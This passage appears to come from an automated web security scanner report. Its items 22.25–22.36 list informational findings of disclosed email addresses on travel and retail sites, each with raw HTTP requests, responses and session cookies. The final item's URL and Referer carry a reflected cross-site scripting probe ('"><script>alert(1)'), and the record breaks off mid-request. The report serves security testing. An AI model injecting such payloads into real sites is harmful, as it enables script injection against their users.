Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=hotels&grp=9702&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fad.doubleclick.net%2Fclk%3B222113440%3B45762978%3Bg%3Fhttp%3A%2F%2Fwww.hotels.com%2FPPCSearch%3Fcity%3D%24%7Bcity%7D%2C%24%7Bstate%7D%26arrivalDate%3D%24%7BdepartureDate%3Ad%3A%22dd%2Fmm%2Fyyyy%22%7D%26adultsPerRoom%3D2%26numberOfRooms%3D%24%7Brooms%7D%26departureDate%3D%24%7BreturnDate%3Ad%3A%22dd%2Fmm%2Fyyyy%22%7D%26PSRC%3DIGOUGO%26rffrid%3Dmdp.hcom.US.138.160.02&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=150&pos=3&aii=2fc59ddf-790d-4415-832a-eafa2c6a46cb&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SSRT=Kf2ITgA; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; SSLB=1; SSPV=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA; user=QSplbl9VU3xIQ09NX1VT

Response

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 26 Mar 2011 15:33:11 GMT
Expect:
Content-Type: text/html;charset=UTF-8
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:10:04 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Set-Cookie: SSLB=1; path=/; domain=.hotels.com
Set-Cookie: SSPV=ZgAAAAAAAAAAAAAAAAAAAAAAAAYAAAAAAAA; path=/; domain=.hotels.com; expires=Tue, 02-Oct-2012 00:10:04 GMT
Set-Cookie: mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:10:04 GMT; Path=/
Set-Cookie: homepage_search_data="Qm9zdG9uLA..//10/04/11//10/07/11//2//MM/dd/yy//1643195"; Version=1; Domain=.hotels.com; Max-Age=31536000; Expires=Tue, 02-Oct-2012 00:10:04 GMT; Path=/
Set-Cookie: user=QSplbl9VU3xIQ09NX1VTIUQqMTI0LjEuMC5pMTo5Ny43My4xLmkzOjk4LjYuNDoxMzcuMC4wLmkyOjE0NS4wLjAuaTI6MTA4LjEuMC5pMjoxNTIuMC4wLmkyOjIuMi4xOjE5Ni4xLjA6OTIuMC4wLmkxOjEzMi4yLjAuaTI6MTIxLjUwMy4wLmk3OjEzOC4xLjA6MTk1LjAuMDoxMDQuMC4xfEhDT01fVVM.; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:10:04 GMT; Path=/
Content-Length: 368925

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>

...[SNIP]...
<a id="header_mailto_or_oo" href="mailto:userexperience@hotels.com?subject=Site feedback: search result with dates|en_US|HCOM_US|www.hotels.com " rel="nofollow" title="Love or hate this site? Tell us what you think." showoo="true">
...[SNIP]...
<a id="toplinks_mailto_or_oo" href="mailto:userexperience@hotels.com?subject=Site feedback: search result with dates|en_US|HCOM_US|www.hotels.com " rel="nofollow" title="Love or hate this site? Tell us what you think." showoo="true">
...[SNIP]...

22.25. http://www.hotels.com/search/search.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotels.com
Path:   /search/search.html

Issue detail

The following email address was disclosed in the response:

Request

GET /search/search.html?cd=10-14-11&dd=10-16-11&hid=205543&nr=1&pn=1&r=2&rl=destination%3A1401516%3APROVIDED%3APROVIDED&vt=LIST HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; SSID=BQD8fxscAAAAAAAp_YhOsO4QAin9iE4CAAAAAAAAAAAAiAmJTgCCAAABgwQAAIgJiU4BAIcAAAG0BAAAiAmJTgEA; SSSC=3.G5659051284361178800.2|130.1155:135.1204; SSRT=iAmJTgA; SESSID=1E7124089B9B31810B6A337085BAE51F.hm07tc02; channel=DC; SSLB=1; SSPV=PfwAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAA; mvthistory=185.0.0.i1%3A114.1.0%3A124.1.0.i1%3A130.1.1.i2%3A103.4.1.i6%3A171.1.0%3A48.1.0%3A97.73.1.i3%3A98.6.4%3A142.0.0.i4%3A198.2.0%3A145.0.0.i2%3A200.0.0%3A137.0.0.i2%3A108.1.0.i2%3A190.3.0%3A152.0.0.i2%3A134.0.1%3A196.1.0%3A2.2.1%3A209.0.1%3A147.6.0.i6%3A92.0.0.i1%3A121.503.0.i7%3A132.2.0.i2%3A122.1.0.i3%3A138.1.0%3A149.0.0.i1%3A104.0.1%3A195.0.0%7CHCOM_US; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/14/11//10/16/11//2//MM/dd/yy//"; user=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.

Response

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 26 Mar 2011 15:35:18 GMT
Expect:
Content-Type: text/html;charset=UTF-8
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 01:02:34 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Set-Cookie: SSLB=1; path=/; domain=.hotels.com
Set-Cookie: SSPV=DvwAAAAAAAEAAAAAAAAAAAAAAAMAAAAAAAA; path=/; domain=.hotels.com; expires=Tue, 02-Oct-2012 01:02:34 GMT
Set-Cookie: mvthistory=185.0.0.i1%3A114.1.0%3A124.1.0.i1%3A103.4.1.i6%3A171.1.0%3A130.1.1.i2%3A48.1.0%3A97.73.1.i3%3A84.0.0.i2%3A98.6.4%3A142.0.0.i4%3A119.0.2.i2%3A198.2.0%3A145.0.0.i2%3A200.0.0%3A137.0.0.i2%3A108.1.0.i2%3A190.3.0%3A152.0.0.i2%3A134.0.1%3A196.1.0%3A2.2.1%3A209.0.1%3A78.0.1%3A147.0.1.i6%3A92.0.0.i1%3A121.503.0.i7%3A132.2.0.i2%3A184.0.0.i1%3A122.1.0.i3%3A138.1.0%3A149.0.0.i1%3A104.0.1%3A195.0.0%7CHCOM_US; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 01:02:34 GMT; Path=/
Set-Cookie: homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/14/11//10/16/11//2//MM/dd/yy//1401516"; Version=1; Domain=.hotels.com; Max-Age=31536000; Expires=Tue, 02-Oct-2012 01:02:34 GMT; Path=/
Set-Cookie: user=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.; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 01:02:34 GMT; Path=/
Content-Length: 371034

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>

...[SNIP]...
<a id="header_mailto_or_oo" href="mailto:userexperience@hotels.com?subject=Site feedback: search result with dates|en_US|HCOM_US|www.hotels.com " rel="nofollow" title="Love or hate this site? Tell us what you think." showoo="true">
...[SNIP]...
<a id="toplinks_mailto_or_oo" href="mailto:userexperience@hotels.com?subject=Site feedback: search result with dates|en_US|HCOM_US|www.hotels.com " rel="nofollow" title="Love or hate this site? Tell us what you think." showoo="true">
...[SNIP]...

22.26. http://www.manutd.com/styles/js/jquery.jqplugin.1.0.2.min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.manutd.com
Path:   /styles/js/jquery.jqplugin.1.0.2.min.js

Issue detail

The following email address was disclosed in the response:

Request

GET /styles/js/jquery.jqplugin.1.0.2.min.js HTTP/1.1
Host: www.manutd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.manutd.com/Splash-Page.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: checkSplashPassage=1

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Mon, 28 Feb 2011 11:52:36 GMT
Accept-Ranges: bytes
ETag: "01abafd3dd7cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
svr: web7
Content-Length: 1717
Cache-Control: max-age=427633
Date: Sun, 02 Oct 2011 23:49:03 GMT
Connection: close

/*
*jQuery browser plugin detection 1.0.2
* http://plugins.jquery.com/project/jqplugin
* Checks for plugins / mimetypes supported in the browser extending the jQuery.browser object
* Copyright (c) 2008 Leonardo Rossetti motw.leo@gmail.com
* MIT License: http://www.opensource.org/licenses/mit-license.php
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
...[SNIP]...

22.27. http://www.nike.com/nikeos/global/js/NIKEOS.global.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nike.com
Path:   /nikeos/global/js/NIKEOS.global.js

Issue detail

The following email address was disclosed in the response:

Request

GET /nikeos/global/js/NIKEOS.global.js HTTP/1.1
Host: www.nike.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.nike.com/nikeos/p/nikefootball/language_tunnel?lid=nikebutton
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 20 Jun 2011 13:27:18 GMT
ETag: "c507-4a624b1bf9980"
Accept-Ranges: bytes
Content-Length: 50439
Content-Type: application/javascript
Expires: Mon, 03 Oct 2011 02:03:04 GMT
Date: Sun, 02 Oct 2011 23:58:30 GMT
Connection: close

var JQ = jQuery.noConflict();

// GLOBAL NIKEOS NAMESPACE
if (!window.NIKEOS) var NIKEOS = {};

/*
   SET THE SITE MODE
   10.30.08 - added localhost environment
*/
if (location.host.match(/insid
...[SNIP]...
arguments';
       else if (obj.item) return 'collection';
   }
   return typeof obj;
};

/* End MooTools Utility Functions */

/**
* To append global login new version (gigya, chinesse checkers)
* tomas.roggero@rga.com
*/
var CHINESE_CHECKERS = null, CheckersHookFile;
var host = window.location.host || window.location.hostname;
/* new code */
if( !( host.indexOf('nike-dev') === 0 || location.href.indexOf('/act
...[SNIP]...

22.28. http://www.nike.com/nikeos/global/js/plugins/jquery.cookie.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nike.com
Path:   /nikeos/global/js/plugins/jquery.cookie.js

Issue detail

The following email address was disclosed in the response:

Request

GET /nikeos/global/js/plugins/jquery.cookie.js HTTP/1.1
Host: www.nike.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.nike.com/nikeos/p/nikefootball/language_tunnel?lid=nikebutton
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Thu, 28 May 2009 18:14:20 GMT
ETag: "1096-46afcedc11700"
Accept-Ranges: bytes
Content-Length: 4246
Content-Type: application/javascript
Expires: Mon, 03 Oct 2011 00:37:57 GMT
Date: Sun, 02 Oct 2011 23:58:30 GMT
Connection: close

/**
* Cookie plugin
*
* Copyright (c) 2006 Klaus Hartl (stilbuero.de)
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* http://www.gnu.org/li
...[SNIP]...
kie will be set and the cookie transmission will
* require a secure protocol (like HTTPS).
* @type undefined
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/

/**
* Get the value of a cookie with the given name.
*
* @example $.cookie('the_cookie');
* @desc Get the value of a cookie.
*
* @param String name The name of the cookie.
* @return The value of the cookie.
* @type String
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
jQuery.cookie = function(name, value, options) {
if (typeof value != 'undefined') { // name and value given, set cookie
options = options || {};
if (value === null) {

...[SNIP]...

22.29. http://www.orbitz.com/shared/js/exitApp.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /shared/js/exitApp.js

Issue detail

The following email address was disclosed in the response:

Request

GET /shared/js/exitApp.js?cache=20041122 HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.orbitz.com/App/ViewFlightSearchResults?retrieveParams=true&z=115e&r=84x&z=115f&r=84y&lastPage=interstitial
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=10644782471317600406435; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; myTests=UBP323_SinglePage:|:|MERCH500_LeadPriceHiding:|HOTEL200_SR_Navigation:1|:|HotelRecommendationAlgorithm:|UBP_Telesales_Optimization:|:|:|HOTEL210_Dateless_Recommendations:|v1; _br_uid_1=uid%3D999836241826%3A; curr=USD; MKTG="ABCDEFGHU0VNfEMxMTI4N3g2MDAtQ1lCb3N0b24sVW5pdGVkIFN0YXRlc3wgfDEzMTc2MDE2MjE4Mjd8QzExMjg3eDYwMC1DWUJvc3RvbixVbml0ZWQgU3RhdGVzfCB8MTAvMDIvMjAxMSAxOToyNzowMSBQTXwgfCA="; dpc=HOTEL%7C2.2%7C%7CBoston%2CUnited+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-04%7C2011-10-07%7C%7C+%7C%26%26HE; _br_uid_2=uid%3D999836241826%3A%3A_uid%3D999836241826%3A; OSC=6EA6F85923281CCF7F006954C370B1AB; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72845525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; adRotator=true; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; PackagingContext=APH; DataPersistence=||||||||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|BOS|MIA|10/11/11|||||||||10/24/11|10/24/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||advanced|; OrbitzRegistration="N,2,0,0"; logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317598618455:ss=1317596806325; mbox=session#1317600406536-142286#1317604079|PC#1317600406536-142286.19#1320194219|check#true#1317602279

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 26 Sep 2011 15:42:28 GMT
ETag: "760-4adda01972100"
Content-Type: application/x-javascript
ntCoent-Length: 1888
Server: Apache
Date: Mon, 03 Oct 2011 00:37:01 GMT
Age: 3052
Connection: keep-alive
Cache-Control: private
Content-Length: 1888

//bleach@orbitz.com - 09.04.04 - Deal Detector

var runUnLoadActivity=true;
var minutes=60; //how many minutes until the window closes
var closeTime=minutes*1000*60;
var numPerDay = 100; //number of popups to see in one
...[SNIP]...

22.30. http://www.sabreairlinesolutions.com/home/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabreairlinesolutions.com
Path:   /home/

Issue detail

The following email address was disclosed in the response:

Request

GET /home/ HTTP/1.1
Host: www.sabreairlinesolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sabre.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:07:32 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317618452; expires=Tue, 02-Oct-2012 00:07:32 GMT; path=/; domain=www.sabreairlinesolutions.com
Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=www.sabreairlinesolutions.com
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:07:33 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15314


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...
<a href="mailto:web@sabre.com">
...[SNIP]...

22.31. http://www.sabreairlinesolutions.com/js/jquery.colorbox-min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabreairlinesolutions.com
Path:   /js/jquery.colorbox-min.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/jquery.colorbox-min.js HTTP/1.1
Host: www.sabreairlinesolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabreairlinesolutions.com/home/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258450; exp_last_activity=1317618450; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:07:32 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Sat, 09 Jul 2011 02:17:45 GMT
ETag: "e40c6f-2427-8e3c6440"
Accept-Ranges: bytes
Content-Length: 9255
Connection: close
Content-Type: application/x-javascript

// ColorBox v1.3.16 - a full featured, light-weight, customizable lightbox based on jQuery 1.3+
// Copyright (c) 2011 Jack Moore - jack@colorpowered.com
// Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php
(function(a,b,c){function ba(b){if(!T){O=b,Z(a.extend(J,a.data(O,e))),x=a(O),P=0,J.rel!=="nofollow"&&(x=a("."+V).f
...[SNIP]...

22.32. http://www.sabreairlinesolutions.com/js/jquery.cookie.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabreairlinesolutions.com
Path:   /js/jquery.cookie.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/jquery.cookie.js HTTP/1.1
Host: www.sabreairlinesolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabreairlinesolutions.com/home/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258450; exp_last_activity=1317618450; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:07:32 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 12 Jan 2010 23:22:08 GMT
ETag: "e40689-1096-ec314800"
Accept-Ranges: bytes
Content-Length: 4246
Connection: close
Content-Type: application/x-javascript

/**
* Cookie plugin
*
* Copyright (c) 2006 Klaus Hartl (stilbuero.de)
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* http://www.gnu.org/li
...[SNIP]...
kie will be set and the cookie transmission will
* require a secure protocol (like HTTPS).
* @type undefined
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/

/**
* Get the value of a cookie with the given name.
*
* @example $.cookie('the_cookie');
* @desc Get the value of a cookie.
*
* @param String name The name of the cookie.
* @return The value of the cookie.
* @type String
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
jQuery.cookie = function(name, value, options) {
if (typeof value != 'undefined') { // name and value given, set cookie
options = options || {};
if (value === null) {

...[SNIP]...

22.33. http://www.sabreairlinesolutions.com/js/jquery.equalHeights.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabreairlinesolutions.com
Path:   /js/jquery.equalHeights.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /js/jquery.equalHeights.js HTTP/1.1
Host: www.sabreairlinesolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabreairlinesolutions.com/home/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258450; exp_last_activity=1317618450; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:07:32 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 29 Jul 2011 15:02:16 GMT
ETag: "e40c71-12ea-912fce00"
Accept-Ranges: bytes
Content-Length: 4842
Connection: close
Content-Type: application/x-javascript

/*--------------------------------------------------------------------
* JQuery Plugin: "EqualHeights" & "EqualWidths"
* by:    Scott Jehl, Todd Parker, Maggie Costello Wachs (http://www.filamentgroup
...[SNIP]...
his).children().css({'min-width': currentWidest});
   });
   return this;
};


/*--------------------------------------------------------------------
* javascript method: "pxToEm"
* by:
Scott Jehl (scott@filamentgroup.com)
Maggie Wachs (maggie@filamentgroup.com)
http://www.filamentgroup.com
*
* Copyright (c) 2008 Filament Group
* Dual licensed under the MIT (filamentgroup.com/examples/mit-license.txt) and GPL (filamentgroup.com/examples/gpl-license.txt
...[SNIP]...

22.34. http://www.sabrehospitality.com/js/modal.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabrehospitality.com
Path:   /js/modal.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/modal.js HTTP/1.1
Host: www.sabrehospitality.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabrehospitality.com/?esiteurl=sabrehospitalitysolutions.com
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7578a4s2f2v2eeuc05nnpk0f35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:07:45 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Thu, 25 Feb 2010 04:34:37 GMT
ETag: "27cc51-f27-4ce57140"
Accept-Ranges: bytes
Content-Length: 3879
Connection: close
Content-Type: application/x-javascript

/*
* jqModal - Minimalist Modaling with jQuery
* (http://dev.iceburg.net/jquery/jqmodal/)
*
* Copyright (c) 2007,2008 Brice Burgess <bhb@iceburg.net>
* Dual licensed under the MIT and GPL licen
...[SNIP]...

22.35. http://www.sabrehospitality.com/js/roundies.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabrehospitality.com
Path:   /js/roundies.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/roundies.js HTTP/1.1
Host: www.sabrehospitality.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabrehospitality.com/?esiteurl=sabrehospitalitysolutions.com
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7578a4s2f2v2eeuc05nnpk0f35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:07:44 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Fri, 02 Jan 2009 03:19:06 GMT
ETag: "27cbd7-20ed-6751be80"
Accept-Ranges: bytes
Content-Length: 8429
Connection: close
Content-Type: application/x-javascript

/**
* DD_roundies, this adds rounded-corner CSS in standard browsers and VML sublayers in IE that accomplish a similar appearance when comparing said browsers.
* Author: Drew Diller
* Email: drew.diller@gmail.com
* URL: http://www.dillerdesign.com/experiment/DD_roundies/
* Version: 0.0.2a - preview 2008.12.26
* Licensed under the MIT License: http://dillerdesign.com/experiment/DD_roundies/#license
*
* Us
...[SNIP]...

22.36. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3C/images/loadingAnimation.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabretravelnetwork.com
Path:   /home55bd4%22%3E%3Cscript%3Ealert(1)%3C/images/loadingAnimation.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /home55bd4%22%3E%3Cscript%3Ealert(1)%3C/images/loadingAnimation.gif HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3C/script%3E0ad586733cb?css=includes/local_exceptions.v.1235614021
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
